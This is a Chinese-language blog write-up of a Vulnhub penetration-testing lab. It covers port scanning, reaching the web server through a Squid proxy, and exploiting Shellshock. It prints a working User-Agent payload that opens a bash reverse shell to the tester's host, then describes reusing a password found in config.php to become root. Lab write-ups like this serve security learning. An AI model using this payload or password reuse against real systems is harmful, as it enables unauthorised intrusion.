2019-01-09-Vulnhub渗透测试实战writeup(
从这一个起争取不看writeup自己把他做出来。。。。
首先安装以后就老是ping不通,换了网卡也不行,后来多次折腾感觉应该是防火墙的问题,于是一波 sudo ufw disable就解决了,学习一波。。。
p1
然后直接首页截个图吧!
p2
然后nmap一波。。。
# Nmap 7.40 scan initiated Wed Jan 9 04:07:33 2019 as: nmap -A -sV -p- -oN 1.xml 192.168.110.138
Nmap scan report for 192.168.110.138
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.19//代理?
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:8B:82:EE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.37 ms 192.168.110.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 9 04:08:30 2019 -- 1 IP address (1 host up) scanned in 57.20 seconds
robots.txt上disallow的是wolfcms。
再继续上dirb一波
+ http://192.168.110.138/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.110.138/connect (CODE:200|SIZE:109)//一波嘲笑,但是说明有python环境
+ http://192.168.110.138/index (CODE:200|SIZE:21)
+ http://192.168.110.138/index.php (CODE:200|SIZE:21)
+ http://192.168.110.138/robots (CODE:200|SIZE:45)
+ http://192.168.110.138/robots.txt (CODE:200|SIZE:45)//暴露wolfcms
+ http://192.168.110.138/server-status (CODE:403|SIZE:296)
所有的突破口里面cms可能是最重的,所以我从cms入手先吧!
cms用的是wolfcms,直接dirb http://192.168.110.138/wolfcms 没发现登录界面,于是Google了一波,发现github上有开源出来https://github.com/wolfcms/wolfcms,但是翻了几遍都木有发现有登录界面的URL模板路径,所以这条路径就不行了。
不行的话我就想着说能不能从主机漏洞入手,所以看了看nmap的扫描记录,80没啥利用的,22虽然很老但是爆出的漏洞都是一些dos或者用户枚举什么的,虽然漏洞很多但是不实用,所以只能从squid入手,wikipedea告诉我这是一个http代理软件,后来看了walkthrough发现意思是要通过这个端口来访问80端口才能访问到,原来是不用关掉ufw服务的。。。
然后看了下那个squid版本发现metasploit有个缓冲区溢出漏洞可以用,04年很老的,但是最后没用成功。。。
然后可以用nikto扫描一波,命令
nikto -h 192.168.110.138 --useproxy http://192.168.110.138:3128
发现有个shellsock漏洞
p4
研究了一番,metasploit上有一个模块可以用,但是都需要cgi文件的路径,科普一下cgi文件夹下放一些脚本,用于服务器处理交互式请求,但是这里没有文件名,所以用不了。。。。
p5
那怎么办?陷入困境ing,这条路走不通了啊,主机漏洞。。。
只能看一波walkthrough了,看了网上大神的描述,发现有大神直接发现那个shellshock以后,就直接在burp上面发送bash反弹语句,直接反弹回来,这操作???黑人问号
这里科普一下学到的知识,主要是这里的环境是需要代理才能访问的,所以你用Burpsuite抓包以后还得设置代理,让burp发包到那个代理进行http转发
p6
这样就能正常做repeater了。
然后根据大佬做法是直接在user-agent处直接反弹的,截图如下:
payload:() { ignored;};/bin/bash -i >& /dev/tcp/192.168.110.128/7777 0>&1
p7
p8
那么接下来就是后渗透攻击了
进来以后直接找配置文件
find ./ -name config.php#为啥找这个,因为前面github开源的网站模板里面的配置文件就叫config.php
然后发现登录名和密码了哈哈
p9
猜测ssh会不会也是该密码,先找用户名一波。。。
p10
捕捉到了用户名了,直接su一波试试
p11
直接连ROOT都登陆了2333
剩下就没啥了
p12
总结:这个主要学习了代理的用法,接触了shellshock漏洞,然后神用法。。。。后面就没啥了。